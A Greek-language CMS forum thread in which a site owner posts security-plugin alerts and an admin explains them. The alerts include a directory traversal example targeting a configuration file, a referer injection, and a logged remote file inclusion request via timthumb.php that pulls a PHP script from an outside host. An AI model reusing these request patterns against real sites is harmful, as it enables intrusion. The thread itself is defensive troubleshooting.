Elxis CMS Forum

Ελληνικό Forum => Γενικά Θέματα για το Elxis CMS => Topic started by: michalis1984 on March 17, 2013, 02:30:36

Title: Απόπειρα επίθεσης;
Post by: michalis1984 on March 17, 2013, 02:30:36

.. ή μήπως όχι;

Elxis Defender blocked an attack to your site!
 Reference code: SEC-DEFG-0130
 
Elxis Defender report
 Signatures:     general
 Match method:   inmatch
 Haystack:       requesturi
 Pattern match:  ..
 Reason:         Directory traversal attack.
 

Requested URI:  /search/?q=Αναζήτηση...
 IP address:     46.103.4.120
 Hostname:       46-4-120.adsl.cyta.gr
 HTTP Referrer:  http://www.glwsses.gr/components/com_content/plugins/download/includes/dl.php?m=0&c=udvbefezaxebpff+bm0ekvmybgqgpfs+azebzlbmudbvaw==
 User agent:     Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
 Date (UTC):     2013-03-16 22:05:00

Title: Re: Απόπειρα επίθεσης;
Post by: datahell on March 17, 2013, 10:08:31

Όχι δεν είναι. Το πρόβλημα δεν είναι στο downloads, είναι στην url που ζητήθηκε. Είναι εμφανές στην ανάλυση που δίνει ο defender. Οι δύο τελίτσες στο "Αναζήτηση..." θεωρούνται directory traversal attack. Είναι μία τεχνική που χρησιμοποιούν σε επιθέσεις εναντίον script που χειρίζονται αρχεία για να αποκτήσεις πρόσβαση σε κάποιο άλλο αρχείο αλλάζοντας το path, "πχ file=../../configuration.php". Το συγκεκριμένο θεώρησέ το λάθος συναγερμό.

Match method:   inmatch
Haystack:       requesturi
Pattern match:  ..
Reason:         Directory traversal attack.
Requested URI:  /search/?q=Αναζήτηση...

Αν το πρόβλημα επιμείνει κόψε το συγκεκριμένο pattern ως ακολούθως.
Άνοιξε το αρχείο: includes/libraries/elxis/defender/general.php
Σχολίασε την γραμμή 148 βάζοντας δύο slash μπροστά της:
//array('inmatch', 'requesturi', '..', 'Directory traversal attack.'),

Title: Re: Απόπειρα επίθεσης;
Post by: michalis1984 on June 15, 2013, 16:01:29

Ακόμη 2 ειδών

xis Defender blocked an attack to your site!
 Reference code: SEC-DEFG-0181

Elxis Defender report
 Signatures:     general
 Match method:   inmatch
 Haystack:       fromhost
 Pattern match:  result:+%e
 Reason:         Unprintable ASCII Injection/Execution attempt thru referer logging.


 Requested URI:
 IP address:     188.92.75.244
 Hostname:       188.92.75.244
 HTTP Referrer:  http://www.glwsses.gr/contact-us.html+++++++++++++++++++++++++++++result:+%e8%f1%ef%ee%eb%fc%e7%ee%e2%e0%ed+%ed%e8%ea%ed%e5%e9%ec+%22annopeexili%22;+%e2%ee%e7%ec%ee%e6%ed%ee,+%ee%f2%ef%f0%e0%e2%eb%e5%ed%ee;
 User agent:     Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
 Date (UTC):     2013-06-15 06:45:55


Elxis Defender blocked an attack to your site!
 Reference code: SEC-DEFG-0054

 Elxis Defender report
 Signatures:     general
 Match method:   inmatch
 Haystack:       querydec
 Pattern match:  http:
 Reason:         RFI (http).


 Requested URI:  /en/windows-software/video-players-software/meda-player-classic-home-cinema.html&sa=U&ei=8O23UeyFC4by4QTznYD4BQ&ved=0CHkQFjAeOPQD&usg=AFQjCNFTK4THz540VCYok8rGLh_jNA2P9A/wp-content/themes/InnovationScience2/cache/timthumb.php?src=http://bloger.com.tchwebhost.com/xp.php
 IP address:     188.165.246.23
 Hostname:       ns390305.ovh.net
 User agent:     Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
 Date (UTC):     2013-06-12 03:59:59